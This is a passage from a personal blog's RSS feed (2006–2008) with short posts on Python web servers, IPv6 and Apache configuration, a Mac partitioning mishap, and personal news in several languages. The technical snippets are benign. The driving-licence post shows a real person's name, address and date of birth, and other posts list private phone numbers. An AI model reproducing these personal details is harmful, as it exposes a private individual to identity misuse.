  7906.    <description><![CDATA[<p><a href="">Unix Toolbox</a>, a nice collection of Unix/Linux/BSD commands, may be useful for advanced users.</p>
  7907. ]]></description>
  7908.    <content:encoded><![CDATA[<p><a href="">Unix Toolbox</a>, a nice collection of Unix/Linux/BSD commands, may be useful for advanced users.</p>
  7909. ]]></content:encoded>
  7910.  </item>
  7912.  <item>
  7913.    <title>CHALLENGE</title>
  7914.    <link></link>
  7915.    <guid isPermaLink="true"></guid>
  7916.    <dc:creator>Andreas Jaggi</dc:creator>
  7917.    <creativeCommons:license></creativeCommons:license>
  7918.    <pubDate>Wed, 05 Mar 2008 00:00:00 +0100</pubDate>
  7919.    <category domain="">Misc</category>
  7920.    <description><![CDATA[<p><a href="" style="text-decoration: blink;"><b>CHALLENGE</b></a></p>
  7921. <p>Don't ask.</p>
  7922. ]]></description>
  7923.    <content:encoded><![CDATA[<p><a href="" style="text-decoration: blink;"><b>CHALLENGE</b></a></p>
  7924. <p>Don't ask.</p>
  7925. ]]></content:encoded>
  7926.  </item>
  7928.  <item>
  7929.    <title>Too much time for party</title>
  7930.    <link></link>
  7931.    <guid isPermaLink="true"></guid>
  7932.    <dc:creator>Andreas Jaggi</dc:creator>
  7933.    <creativeCommons:license></creativeCommons:license>
  7934.    <pubDate>Thu, 21 Feb 2008 13:40:00 +0100</pubDate>
  7935.    <category domain="">Misc</category>
  7936.    <description><![CDATA[<p>
  7938. <img src="" width="467" height="272" alt="Horaire 2008">
  7940. </p>
  7941. ]]></description>
  7942.    <content:encoded><![CDATA[<p>
  7944. <img src="" width="467" height="272" alt="Horaire 2008">
  7946. </p>
  7947. ]]></content:encoded>
  7948.  </item>
  7950.  <item>
  7951.    <title>Some Links II</title>
  7952.    <link></link>
  7953.    <guid isPermaLink="true"></guid>
  7954.    <dc:creator>Andreas Jaggi</dc:creator>
  7955.    <creativeCommons:license></creativeCommons:license>
  7956.    <pubDate>Fri, 15 Feb 2008 08:53:00 +0100</pubDate>
  7957.    <category domain="">Coding</category>
  7958.    <description><![CDATA[<ul>
  7960. <li><a href="">Python main() functions</a></li>
  7962. <li><a href="">Javascript without IFs, WHILEs, or FORs</a></li>
  7964. <li><a href="">grep in 98 lines of code</a></li>
  7966. </ul>
  7967. ]]></description>
  7968.    <content:encoded><![CDATA[<ul>
  7970. <li><a href="">Python main() functions</a></li>
  7972. <li><a href="">Javascript without IFs, WHILEs, or FORs</a></li>
  7974. <li><a href="">grep in 98 lines of code</a></li>
  7976. </ul>
  7977. ]]></content:encoded>
  7978.  </item>
  7980.  <item>
  7981.    <title>Python Webserver in 1 or 15 lines</title>
  7982.    <link></link>
  7983.    <guid isPermaLink="true"></guid>
  7984.    <dc:creator>Andreas Jaggi</dc:creator>
  7985.    <creativeCommons:license></creativeCommons:license>
  7986.    <pubDate>Thu, 14 Feb 2008 21:10:00 +0100</pubDate>
  7987.    <category domain="">Coding</category>
  7988.    <description><![CDATA[<p>Python Webserver in 1 line:</p>
  7990. <pre>python -c "import SimpleHTTPServer; SimpleHTTPServer.test()"</pre>
  7992. <p>Python Webserver in 15 lines:</p>
  7994. <pre>import BaseHTTPServer
  7998. class WebRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  8000.    def do_GET(self):
  8002.        if self.path == '/foo':
  8004.            self.send_response(200)
  8006.            self.do_something()
  8008.        else:
  8010.            self.send_error(404)
  8014.    def do_something(self):
  8016.        print 'hello world'
  8020. server = BaseHTTPServer.HTTPServer(('',80), WebRequestHandler)
  8022. server.serve_forever()</pre>
  8024. <p><a href="">via</a></p>
  8025. ]]></description>
  8026.    <content:encoded><![CDATA[<p>Python Webserver in 1 line:</p>
  8028. <pre>python -c "import SimpleHTTPServer; SimpleHTTPServer.test()"</pre>
  8030. <p>Python Webserver in 15 lines:</p>
  8032. <pre>import BaseHTTPServer
  8036. class WebRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  8038.    def do_GET(self):
  8040.        if self.path == '/foo':
  8042.            self.send_response(200)
  8044.            self.do_something()
  8046.        else:
  8048.            self.send_error(404)
  8052.    def do_something(self):
  8054.        print 'hello world'
  8058. server = BaseHTTPServer.HTTPServer(('',80), WebRequestHandler)
  8060. server.serve_forever()</pre>
  8062. <p><a href="">via</a></p>
  8063. ]]></content:encoded>
  8064.  </item>
  8066.  <item>
  8067.    <title>Some Links</title>
  8068.    <link></link>
  8069.    <guid isPermaLink="true"></guid>
  8070.    <dc:creator>Andreas Jaggi</dc:creator>
  8071.    <creativeCommons:license></creativeCommons:license>
  8072.    <pubDate>Mon, 11 Feb 2008 10:00:00 +0100</pubDate>
  8073.    <category domain="">Coding</category>
  8074.    <description><![CDATA[<ul>
  8076. <li><a href="">RegexPal, a JavaScript regular expression tester</a></li>
  8078. <li><a href="">Namespacing your JavaScript</a></li>
  8080. <li><a href="">In Vim Marks visualisieren</a></li>
  8082. </ul>
  8083. ]]></description>
  8084.    <content:encoded><![CDATA[<ul>
  8086. <li><a href="">RegexPal, a JavaScript regular expression tester</a></li>
  8088. <li><a href="">Namespacing your JavaScript</a></li>
  8090. <li><a href="">In Vim Marks visualisieren</a></li>
  8092. </ul>
  8093. ]]></content:encoded>
  8094.  </item>
  8096.  <item>
  8097.    <title>Biking to work was much more fun in California</title>
  8098.    <link></link>
  8099.    <guid isPermaLink="true"></guid>
  8100.    <dc:creator>Andreas Jaggi</dc:creator>
  8101.    <creativeCommons:license></creativeCommons:license>
  8102.    <pubDate>Mon, 04 Feb 2008 20:30:00 +0100</pubDate>
  8103.    <category domain="">Misc</category>
  8104.    <description><![CDATA[<img src="" width="349" height="416" alt="Cold weather">
  8105. ]]></description>
  8106.    <content:encoded><![CDATA[<img src="" width="349" height="416" alt="Cold weather">
  8107. ]]></content:encoded>
  8108.  </item>
  8110.  <item>
  8111.    <title>Pancake Man</title>
  8112.    <link></link>
  8113.    <guid isPermaLink="true"></guid>
  8114.    <dc:creator>Andreas Jaggi</dc:creator>
  8115.    <creativeCommons:license></creativeCommons:license>
  8116.    <pubDate>Mon, 04 Feb 2008 20:14:00 +0100</pubDate>
  8117.    <category domain="">Misc</category>
  8118.    <description><![CDATA[<p><a href="" title="Pancake Man - YouTube">Pancake Man</a></p>
  8119. ]]></description>
  8120.    <content:encoded><![CDATA[<p><a href="" title="Pancake Man - YouTube">Pancake Man</a></p>
  8121. ]]></content:encoded>
  8122.  </item>
  8124.  <item>
  8125.    <title>UNIX tips</title>
  8126.    <link></link>
  8127.    <guid isPermaLink="true"></guid>
  8128.    <dc:creator>Andreas Jaggi</dc:creator>
  8129.    <creativeCommons:license></creativeCommons:license>
  8130.    <pubDate>Thu, 24 Jan 2008 22:29:00 +0100</pubDate>
  8131.    <category domain="">Linux</category>
  8132.    <description><![CDATA[<ul>
  8134. <li><a href="">Learn 10 good UNIX usage habits</a></li>
  8136. <li><a href="">Productivity tips</a></li>
  8138. <li><a href="">Become a better blogger with UNIX</a></li>
  8140. </ul>
  8141. ]]></description>
  8142.    <content:encoded><![CDATA[<ul>
  8144. <li><a href="">Learn 10 good UNIX usage habits</a></li>
  8146. <li><a href="">Productivity tips</a></li>
  8148. <li><a href="">Become a better blogger with UNIX</a></li>
  8150. </ul>
  8151. ]]></content:encoded>
  8152.  </item>
  8154.  <item>
  8155.    <title>How to brick your Mac</title>
  8156.    <link></link>
  8157.    <guid isPermaLink="true"></guid>
  8158.    <dc:creator>Andreas Jaggi</dc:creator>
  8159.    <creativeCommons:license></creativeCommons:license>
  8160.    <pubDate>Sat, 19 Jan 2008 00:32:00 +0100</pubDate>
  8161.    <category domain="">Mac</category>
  8162.    <description><![CDATA[<ol>
  8164. <li>Install Mac OS X 10.4</li>
  8166. <li>Install <a href="">rEFIt</a></li>
  8168. <li>Install Linux</li>
  8170. <li>After some time decide to upgrade to Mac OS X 10.5 and at the same time make the partition bigger (e.g. by merging with a FAT32 partition which was originally intended to contain some Windows)</li>
  8172. <li>Use the <a href="">GNU Parted</a> utility to delete the Mac OS X and FAT 32  partitions and create a new bigger partition for Mac OS X 10.5.</li>
  8174. <li>Restart your Mac.</li>
  8176. <li>Cheer that now you can no longer boot from the harddisk or a CD/DVD nor from anything else!</li>
  8178. </ol>
  8180. <p>And now, how to un-brick it again:</p>
  8182. <ol>
  8184. <li>Call Apple support</li>
  8186. <li>Find out that you are lucky and have some warranty left (6 days in my case!!!).</li>
  8188. <li>Bring your Mac to an Authorized Service Provider.</li>
  8190. <li>Get it back with a new harddisk :-)</li>
  8192. </ol>
  8193. ]]></description>
  8194.    <content:encoded><![CDATA[<ol>
  8196. <li>Install Mac OS X 10.4</li>
  8198. <li>Install <a href="">rEFIt</a></li>
  8200. <li>Install Linux</li>
  8202. <li>After some time decide to upgrade to Mac OS X 10.5 and at the same time make the partition bigger (e.g. by merging with a FAT32 partition which was originally intended to contain some Windows)</li>
  8204. <li>Use the <a href="">GNU Parted</a> utility to delete the Mac OS X and FAT 32  partitions and create a new bigger partition for Mac OS X 10.5.</li>
  8206. <li>Restart your Mac.</li>
  8208. <li>Cheer that now you can no longer boot from the harddisk or a CD/DVD nor from anything else!</li>
  8210. </ol>
  8212. <p>And now, how to un-brick it again:</p>
  8214. <ol>
  8216. <li>Call Apple support</li>
  8218. <li>Find out that you are lucky and have some warranty left (6 days in my case!!!).</li>
  8220. <li>Bring your Mac to an Authorized Service Provider.</li>
  8222. <li>Get it back with a new harddisk :-)</li>
  8224. </ol>
  8225. ]]></content:encoded>
  8226.  </item>
  8228.  <item>
  8229.    <title>Embed Flash into valid XHTML documents</title>
  8230.    <link></link>
  8231.    <guid isPermaLink="true"></guid>
  8232.    <dc:creator>Andreas Jaggi</dc:creator>
  8233.    <creativeCommons:license></creativeCommons:license>
  8234.    <pubDate>Sat, 12 Jan 2008 17:12:00 +0100</pubDate>
  8235.    <category domain="">Webdesign</category>
  8236.    <description><![CDATA[<pre>
  8238. &lt;object type="application/x-shockwave-flash" data="flash.swf" width="100" height="200"&gt;
  8240. &lt;param name="movie" value="flash.swf" /&gt;
  8242. &lt;/object&gt;
  8244. </pre>
  8245. ]]></description>
  8246.    <content:encoded><![CDATA[<pre>
  8248. &lt;object type="application/x-shockwave-flash" data="flash.swf" width="100" height="200"&gt;
  8250. &lt;param name="movie" value="flash.swf" /&gt;
  8252. &lt;/object&gt;
  8254. </pre>
  8255. ]]></content:encoded>
  8256.  </item>
  8258.  <item>
  8259.    <title>How to enable IPv6 on your Debian Linux server in 3 easy steps</title>
  8260.    <link></link>
  8261.    <guid isPermaLink="true"></guid>
  8262.    <dc:creator>Andreas Jaggi</dc:creator>
  8263.    <creativeCommons:license></creativeCommons:license>
  8264.    <pubDate>Wed, 09 Jan 2008 16:00:00 +0100</pubDate>
  8265.    <category domain="">Networking</category>
  8266.    <description><![CDATA[<ol>
  8268. <li>Compute your <a href="" title="6to4 - Wikipedia">6to4</a> IPv6 address (2002:uuuu:vvvv::1) from your IPv4 address (a.b.c.d): <pre>printf "2002:%02x%02x:%02x%02x::1\n" a b c d</pre></li>
  8270. <li>Add a SIT (IPv6-in-IPv4) interface in /etc/network/interfaces:
  8272. <pre>auto sit0
  8274. iface sit0 inet6 static
  8276.        address 2002:uuuu:vvvv::1
  8278.        netmask 64
  8280.        gateway ::</pre></li>
  8282. <li><code>ifup sit0</code></li>
  8284. </ol>
  8286. <p>Now you can also add <a href="" title="AAAA - Wikipedia">AAAA DNS records</a> with 2002:uuuu:vvvv::1 for your domain(s).</p>
  8287. ]]></description>
  8288.    <content:encoded><![CDATA[<ol>
  8290. <li>Compute your <a href="" title="6to4 - Wikipedia">6to4</a> IPv6 address (2002:uuuu:vvvv::1) from your IPv4 address (a.b.c.d): <pre>printf "2002:%02x%02x:%02x%02x::1\n" a b c d</pre></li>
  8292. <li>Add a SIT (IPv6-in-IPv4) interface in /etc/network/interfaces:
  8294. <pre>auto sit0
  8296. iface sit0 inet6 static
  8298.        address 2002:uuuu:vvvv::1
  8300.        netmask 64
  8302.        gateway ::</pre></li>
  8304. <li><code>ifup sit0</code></li>
  8306. </ol>
  8308. <p>Now you can also add <a href="" title="AAAA - Wikipedia">AAAA DNS records</a> with 2002:uuuu:vvvv::1 for your domain(s).</p>
  8309. ]]></content:encoded>
  8310.  </item>
  8312.  <item>
  8313.    <title>Breakout Game written in sed</title>
  8314.    <link></link>
  8315.    <guid isPermaLink="true"></guid>
  8316.    <dc:creator>Andreas Jaggi</dc:creator>
  8317.    <creativeCommons:license></creativeCommons:license>
  8318.    <pubDate>Sun, 06 Jan 2008 17:18:00 +0100</pubDate>
  8319.    <category domain="">Linux</category>
  8320.    <description><![CDATA[<p>Instead of learning for the exams, I mess around with strange things:</p>
  8322. <p><a href="">arkanoid.sed</a> is a breakout-game written entirely in <a href="">sed</a>. Download the sed-file and use <code>sed -f arkanoid.sed</code> to start the game. (<a href="">via</a>)</p>
  8324. <p><a href=""><img src="" width="301" height="166" alt="arkanoid.sed"></a></p>
  8325. ]]></description>
  8326.    <content:encoded><![CDATA[<p>Instead of learning for the exams, I mess around with strange things:</p>
  8328. <p><a href="">arkanoid.sed</a> is a breakout-game written entirely in <a href="">sed</a>. Download the sed-file and use <code>sed -f arkanoid.sed</code> to start the game. (<a href="">via</a>)</p>
  8330. <p><a href=""><img src="" width="301" height="166" alt="arkanoid.sed"></a></p>
  8331. ]]></content:encoded>
  8332.  </item>
  8334.  <item>
  8335.    <title>7 Habits For Effective Text Editing 2.0</title>
  8336.    <link></link>
  8337.    <guid isPermaLink="true"></guid>
  8338.    <dc:creator>Andreas Jaggi</dc:creator>
  8339.    <creativeCommons:license></creativeCommons:license>
  8340.    <pubDate>Wed, 02 Jan 2008 10:40:00 +0100</pubDate>
  8341.    <category domain="">Coding</category>
  8342.    <description><![CDATA[<p><a href="" title="7 Habits for Effective Text Editing 2.0 - YouTube">7 Habits for Effective Text Editing 2.0</a></p>
  8344. <p>I really, really should have known the <a href="">* command</a> earlier.</p>
  8345. ]]></description>
  8346.    <content:encoded><![CDATA[<p><a href="" title="7 Habits for Effective Text Editing 2.0 - YouTube">7 Habits for Effective Text Editing 2.0</a></p>
  8348. <p>I really, really should have known the <a href="">* command</a> earlier.</p>
  8349. ]]></content:encoded>
  8350.  </item>
  8352.  <item>
  8353.    <title>Erlang has no locks and no keys.</title>
  8354.    <link></link>
  8355.    <guid isPermaLink="true"></guid>
  8356.    <dc:creator>Andreas Jaggi</dc:creator>
  8357.    <creativeCommons:license></creativeCommons:license>
  8358.    <pubDate>Sun, 23 Dec 2007 23:12:00 +0100</pubDate>
  8359.    <category domain="">Coding</category>
  8360.    <description><![CDATA[<blockquote cite="">
  8362. <p>Erlang processes don't share memory, so there is no need to lock the memory while it is being used. Where there are locks, there are keys that can get lost. What happens when you lose your keys? You panic and don't know what to do. That's what happens in software systems when you lose your keys and your locks go wrong.</p>
  8364. <p>Distributed software systems with locks and keys always go wrong.</p>
  8366. <p>Erlang has no locks and no keys.</p>
  8368. </blockquote>
  8370. <p><a href="">Joe Armstrong, Programming Erlang</a></p>
  8371. ]]></description>
  8372.    <content:encoded><![CDATA[<blockquote cite="">
  8374. <p>Erlang processes don't share memory, so there is no need to lock the memory while it is being used. Where there are locks, there are keys that can get lost. What happens when you lose your keys? You panic and don't know what to do. That's what happens in software systems when you lose your keys and your locks go wrong.</p>
  8376. <p>Distributed software systems with locks and keys always go wrong.</p>
  8378. <p>Erlang has no locks and no keys.</p>
  8380. </blockquote>
  8382. <p><a href="">Joe Armstrong, Programming Erlang</a></p>
  8383. ]]></content:encoded>
  8384.  </item>
  8386.  <item>
  8387.    <title>Won't you blog about this song?</title>
  8388.    <link></link>
  8389.    <guid isPermaLink="true"></guid>
  8390.    <dc:creator>Andreas Jaggi</dc:creator>
  8391.    <creativeCommons:license></creativeCommons:license>
  8392.    <pubDate>Wed, 05 Dec 2007 01:02:00 +0100</pubDate>
  8393.    <category domain="">Misc</category>
  8394.    <description><![CDATA[<p><a href="" title="Here Comes Another Bubble v1.1 - The Richter Scales - YouTube">Here Comes Another Bubble v1.1 - The Richter Scales</a></p><p>(<a href="">via</a>)</p>
  8395. ]]></description>
  8396.    <content:encoded><![CDATA[<p><a href="" title="Here Comes Another Bubble v1.1 - The Richter Scales - YouTube">Here Comes Another Bubble v1.1 - The Richter Scales</a></p><p>(<a href="">via</a>)</p>
  8397. ]]></content:encoded>
  8398.  </item>
  8400.  <item>
  8401.    <title>Enforce HTTPS for your virtualhosts</title>
  8402.    <link></link>
  8403.    <guid isPermaLink="true"></guid>
  8404.    <dc:creator>Andreas Jaggi</dc:creator>
  8405.    <creativeCommons:license></creativeCommons:license>
  8406.    <pubDate>Sun, 16 Sep 2007 14:13:49 +0200</pubDate>
  8407.    <category domain="">Linux</category>
  8408.    <description><![CDATA[<pre>
  8409. NameVirtualHost *:443
  8410. NameVirtualHost *:80
  8412. &lt;VirtualHost *:80&gt;
  8413. ServerName
  8414. RewriteEngine on
  8415. RewriteRule ^(.*)$ https://%{SERVER_NAME}$1 [L,R]
  8416. &lt;/VirtualHost&gt;
  8418. &lt;VirtualHost *:443&gt;
  8419. ServerName
  8420. DocumentRoot /var/www/
  8421. ...
  8422. &lt;/VirtualHost&gt;
  8423. </pre>
  8425. ]]></description>
  8426.    <content:encoded><![CDATA[<pre>
  8427. NameVirtualHost *:443
  8428. NameVirtualHost *:80
  8430. &lt;VirtualHost *:80&gt;
  8431. ServerName
  8432. RewriteEngine on
  8433. RewriteRule ^(.*)$ https://%{SERVER_NAME}$1 [L,R]
  8434. &lt;/VirtualHost&gt;
  8436. &lt;VirtualHost *:443&gt;
  8437. ServerName
  8438. DocumentRoot /var/www/
  8439. ...
  8440. &lt;/VirtualHost&gt;
  8441. </pre>
  8443. ]]></content:encoded>
  8444.  </item>
  8446.  <item>
  8447.    <title>California driving test: passed!</title>
  8448.    <link></link>
  8449.    <guid isPermaLink="true"></guid>
  8450.    <dc:creator>Andreas Jaggi</dc:creator>
  8451.    <creativeCommons:license></creativeCommons:license>
  8452.    <pubDate>Thu, 26 Jul 2007 05:10:05 +0200</pubDate>
  8453.    <category domain="">Misc</category>
  8454.    <description><![CDATA[<p>I passed the California driving test this afternoon, now the streets are no longer safe :-)<br>The interim driver license looks really shabby, it's just this text printed on cheap copier paper:</p>
  8455. <pre>
  8456.                        INTERIM DRIVER LICENSE
  8458.                  DXXXXXXX        CLASS C
  8461.            ISSUED:07-25-07   XXX   XX/XX   EXPIRES:09-22-07
  8463. ANDREAS RENE JAGGI                       SEX:M   HAIR:BRN   EYES:HZL
  8464. 900 ISLAND DR STE 101                    HT:5-11   WT:187   DOB:01-22-84
  8465. REDWOOD CITY   CA  94065
  8470.                REGISTRATION, OR PUBLIC BENEFITS.
  8471. </pre>
  8472. <p>Also the driving test itself was more like a joke than a real test. I just had to drive around for about 10 minutes. No highway driving, no complicated intersections, no 'advanced' maneuvers, no real parallel parking. In fact the "parallel parking" part was to pull over to the curb and drive backwards 3 meters (w/o any other car around of course). And the most complicated maneuvers were to change lanes and to make a left turn at an intersection.</p>
  8473. ]]></description>
  8474.    <content:encoded><![CDATA[<p>I passed the California driving test this afternoon, now the streets are no longer safe :-)<br>The interim driver license looks really shabby, it's just this text printed on cheap copier paper:</p>
  8475. <pre>
  8476.                        INTERIM DRIVER LICENSE
  8478.                  DXXXXXXX        CLASS C
  8481.            ISSUED:07-25-07   XXX   XX/XX   EXPIRES:09-22-07
  8483. ANDREAS RENE JAGGI                       SEX:M   HAIR:BRN   EYES:HZL
  8484. 900 ISLAND DR STE 101                    HT:5-11   WT:187   DOB:01-22-84
  8485. REDWOOD CITY   CA  94065
  8490.                REGISTRATION, OR PUBLIC BENEFITS.
  8491. </pre>
  8492. <p>Also the driving test itself was more like a joke than a real test. I just had to drive around for about 10 minutes. No highway driving, no complicated intersections, no 'advanced' maneuvers, no real parallel parking. In fact the "parallel parking" part was to pull over to the curb and drive backwards 3 meters (w/o any other car around of course). And the most complicated maneuvers were to change lanes and to make a left turn at an intersection.</p>
  8493. ]]></content:encoded>
  8494.  </item>
  8496.  <item>
  8497.    <title>Bicycle stolen!</title>
  8498.    <link></link>
  8499.    <guid isPermaLink="true"></guid>
  8500.    <dc:creator>Andreas Jaggi</dc:creator>
  8501.    <creativeCommons:license></creativeCommons:license>
  8502.    <pubDate>Mon, 23 Jul 2007 07:08:40 +0200</pubDate>
  8503.    <category domain="">Misc</category>
  8504.    <description><![CDATA[<p>This afternoon some asshole has stolen my bicycle.<br>I left it locked to the bike rack at the Hillsdale Caltrain station for 5 hours while I went shopping in SF. And now it's gone :-(</p>
  8505. <p>Of course I called the police, but even the deputy sheriff of San Mateo county said that I will probably never see my bike again.<br>So if you happen to find or see a bicycle with the following characteristics, please tell me (650.888.0140) or report to the police.</p>
  8507. <table>
  8508. <tr><td>Serial#</td>
  8509. <td><strong>IDC07B22590</strong></td></tr>
  8510. <tr><td>Brand</td>
  8511. <td><strong>GT</strong></td></tr>
  8512. <tr><td>Model</td>
  8513. <td><strong>Avalanche 3.0 (2007)</strong></td></tr>
  8514. <tr><td>Color</td>
  8515. <td><strong>black</strong></td></tr>
  8516. <tr><td>Size</td>
  8517. <td><strong>XL</strong></td></tr>
  8518. </table>
  8520. <p><a href=""><img src="" alt="Stolen GT Avalanche 3.0 2006 - owner 650.888.0140"></a></p>
  8521. ]]></description>
  8522.    <content:encoded><![CDATA[<p>This afternoon some asshole has stolen my bicycle.<br>I left it locked to the bike rack at the Hillsdale Caltrain station for 5 hours while I went shopping in SF. And now it's gone :-(</p>
  8523. <p>Of course I called the police, but even the deputy sheriff of San Mateo county said that I will probably never see my bike again.<br>So if you happen to find or see a bicycle with the following characteristics, please tell me (650.888.0140) or report to the police.</p>
  8525. <table>
  8526. <tr><td>Serial#</td>
  8527. <td><strong>IDC07B22590</strong></td></tr>
  8528. <tr><td>Brand</td>
  8529. <td><strong>GT</strong></td></tr>
  8530. <tr><td>Model</td>
  8531. <td><strong>Avalanche 3.0 (2007)</strong></td></tr>
  8532. <tr><td>Color</td>
  8533. <td><strong>black</strong></td></tr>
  8534. <tr><td>Size</td>
  8535. <td><strong>XL</strong></td></tr>
  8536. </table>
  8538. <p><a href=""><img src="" alt="Stolen GT Avalanche 3.0 2006 - owner 650.888.0140"></a></p>
  8539. ]]></content:encoded>
  8540.  </item>
  8542.  <item>
  8543.    <title>Kuriose Fakten über mich</title>
  8544.    <link></link>
  8545.    <guid isPermaLink="true"></guid>
  8546.    <dc:creator>Andreas Jaggi</dc:creator>
  8547.    <creativeCommons:license></creativeCommons:license>
  8548.    <pubDate>Sat, 10 Feb 2007 00:25:52 +0100</pubDate>
  8549.    <category domain="">Misc</category>
  8550.    <description><![CDATA[<p><a href=",_Fakten,_Fakten)%C2%B2/">Robert</a> will zum Wochenende noch ein paar Fakten sehen:</p>
  8552. <ol>
  8554. <li>Ich hasse Arbeiten Schreiben, Lernen, etc. aber trotzdem sitze ich seit 15&#189; Jahren hinter der Schulbank (und bin damit noch immer nicht fertig).</li>
  8556. <li>Im nächsten Semester gehe ich endlich mal nicht zur Schule sondern <del>mache Ferien in Kalifornien</del> programmiere bei <a href="">Novawave Technologies</a> an Embedded Linux Geräten herum.</li>
  8558. <li>Je mehr ich neben dem Studium mache, desto besser werden meine Noten.</li>
  8560. <li>Vor langer Zeit habe ich einmal Schlagzeug gespielt.</li>
  8562. <li>Vor noch längerer Zeit sogar Blockflöte.</li>
  8564. <li>Zwei mal pro Woche fahre ich über <a href="">eine der schönsten Bahnstrecken</a> und dabei schlafe ich oder starre in meinen Laptop.</li>
  8566. <li>Ich interessiere mich für Eventtechnik und nicht zu wenig (<a href="">Satellite</a>,
  8567. <a href="">Bal&#233;lec</a>,
  8568. Challenge 06,
  8569. <a href="">Artiphys</a>,
  8570. <a href="">Vivapoly</a>,
  8571. <a href="">ClosedAir 06</a>,
  8572. <a href="">Polybeach</a>,
  8573. <a href="">PIP</a>).</li>
  8574. </ol>
  8576. <p>Mal schauen ob <a href="#" class="gone">Andreas</a> oder <a href="">Gordon</a> was über sich erzählen wollen.</p>
  8578. ]]></description>
  8579.    <content:encoded><![CDATA[<p><a href=",_Fakten,_Fakten)%C2%B2/">Robert</a> will zum Wochenende noch ein paar Fakten sehen:</p>
  8581. <ol>
  8583. <li>Ich hasse Arbeiten Schreiben, Lernen, etc. aber trotzdem sitze ich seit 15&#189; Jahren hinter der Schulbank (und bin damit noch immer nicht fertig).</li>
  8585. <li>Im nächsten Semester gehe ich endlich mal nicht zur Schule sondern <del>mache Ferien in Kalifornien</del> programmiere bei <a href="">Novawave Technologies</a> an Embedded Linux Geräten herum.</li>
  8587. <li>Je mehr ich neben dem Studium mache, desto besser werden meine Noten.</li>
  8589. <li>Vor langer Zeit habe ich einmal Schlagzeug gespielt.</li>
  8591. <li>Vor noch längerer Zeit sogar Blockflöte.</li>
  8593. <li>Zwei mal pro Woche fahre ich über <a href="">eine der schönsten Bahnstrecken</a> und dabei schlafe ich oder starre in meinen Laptop.</li>
  8595. <li>Ich interessiere mich für Eventtechnik und nicht zu wenig (<a href="">Satellite</a>,
  8596. <a href="">Bal&#233;lec</a>,
  8597. Challenge 06,
  8598. <a href="">Artiphys</a>,
  8599. <a href="">Vivapoly</a>,
  8600. <a href="">ClosedAir 06</a>,
  8601. <a href="">Polybeach</a>,
  8602. <a href="">PIP</a>).</li>
  8603. </ol>
  8605. <p>Mal schauen ob <a href="#" class="gone">Andreas</a> oder <a href="">Gordon</a> was über sich erzählen wollen.</p>
  8607. ]]></content:encoded>
  8608.  </item>
  8610.  <item>
  8611.    <title>Jamendo rocks!</title>
  8612.    <link></link>
  8613.    <guid isPermaLink="true"></guid>
  8614.    <dc:creator>Andreas Jaggi</dc:creator>
  8615.    <creativeCommons:license></creativeCommons:license>
  8616.    <pubDate>Fri, 09 Feb 2007 09:04:19 +0100</pubDate>
  8617.    <category domain="">Music</category>
  8618.    <description><![CDATA[<p><a href="" title="My Jamendo playlist with french rock music">Jamendo playlist</a></p>
  8619. ]]></description>
  8620.    <content:encoded><![CDATA[<p><a href="" title="My Jamendo playlist with french rock music">Jamendo playlist</a></p>
  8621. ]]></content:encoded>
  8622.  </item>
  8624.  <item>
  8625.    <title>Chambre à louer à Vufflens-la-ville</title>
  8626.    <link></link>
  8627.    <guid isPermaLink="true"></guid>
  8628.    <dc:creator>Andreas Jaggi</dc:creator>
  8629.    <creativeCommons:license></creativeCommons:license>
  8630.    <pubDate>Sat, 03 Feb 2007 18:48:08 +0100</pubDate>
  8631.    <category domain="">Misc</category>
  8632.    <description><![CDATA[<p>A Vufflens-la-Ville (10 min. en voiture de l'EPFL, 45 min. en train), &#224; louer du 10 mars au 15 septembre 2007 une chambre meubl&#233;e ind&#233;pendante de 32 m<sup>2</sup> avec coin cuisine et ADSL, situ&#233;e dans une ancienne ferme habit&#233;e par une famille (salle d'eau en commun, possibilit&#233; d'utiliser le jardin), pour 530 francs par mois, charges comprises.<br>
  8633. T&#233;l. de pr&#233;f&#233;rence le soir au 021'701'14'61 ou au 078'645'56'83.</p>
  8635. <p><a href=""><img width="300" height="225" style="border:0;" src="" alt="chambre"></a></p>
  8636. <p><a href=""><img width="300" height="225" style="border:0;" src="" alt="Jardin"></a></p>
  8637. <p><a href=""><img width="300" height="225" style="border:0;" src="" alt="Jardin"></a></p>
  8639. ]]></description>
  8640.    <content:encoded><![CDATA[<p>A Vufflens-la-Ville (10 min. en voiture de l'EPFL, 45 min. en train), &#224; louer du 10 mars au 15 septembre 2007 une chambre meubl&#233;e ind&#233;pendante de 32 m<sup>2</sup> avec coin cuisine et ADSL, situ&#233;e dans une ancienne ferme habit&#233;e par une famille (salle d'eau en commun, possibilit&#233; d'utiliser le jardin), pour 530 francs par mois, charges comprises.<br>
  8641. T&#233;l. de pr&#233;f&#233;rence le soir au 021'701'14'61 ou au 078'645'56'83.</p>
  8643. <p><a href=""><img width="300" height="225" style="border:0;" src="" alt="chambre"></a></p>
  8644. <p><a href=""><img width="300" height="225" style="border:0;" src="" alt="Jardin"></a></p>
  8645. <p><a href=""><img width="300" height="225" style="border:0;" src="" alt="Jardin"></a></p>
  8647. ]]></content:encoded>
  8648.  </item>
  8650.  <item>
  8651.    <title>Des jours sans rien</title>
  8652.    <link></link>
  8653.    <guid isPermaLink="true"></guid>
  8654.    <dc:creator>Andreas Jaggi</dc:creator>
  8655.    <creativeCommons:license></creativeCommons:license>
  8656.    <pubDate>Sun, 17 Sep 2006 13:32:25 +0200</pubDate>
  8657.    <category domain="">Music</category>
  8658.    <description><![CDATA[<p>Je me rapelle ces cellules vides<br>
  8659. Tout petits bouts de vie sordides<br>
  8660. Je passe ma journ&#233;e &#224; attendre<br>
  8661. Que quelqu'un tente de la comprendre<br>
  8662. Il vaut mieux apprendre &#224; mentir<br>
  8663. Se supporter tant mal que pire<br>
  8664. Mieux vaut apprendre &#224; oublier<br>
  8665. Que tous les jours faut se lever<br>
  8666. Trouver la force d'y croire encore<br>
  8667. Quand tout notre corps hurle &quot;assez&quot;<br>
  8668. Sourire &#224; des gens inconnus<br>
  8669. Quand ceux qu'on aime ne sourient plus<br>
  8670. Dans la galerie de nos amours perdues<br>
  8671. Se souvenir que l'on n'est rien<br>
  8672. Qu'un paranth&#232;se dans le destin<br>
  8673. Sous-particule du genre humain<br>
  8674. Et ces journ&#233;es sont toutes les m&#234;mes<br>
  8675. Avec nos peurs et nos &quot;je t'aime&quot;<br>
  8676. Avec cette solitude am&#232;re<br>
  8677. On vit &#8211; on meurt et on esp&#232;re<br>
  8678. Une derni&#232;re lettre abandon&#233;e<br>
  8679. Du rouge &#224; l&#232;vres sur un caf&#233;<br>
  8680. N'importe quoi pour oublier<br>
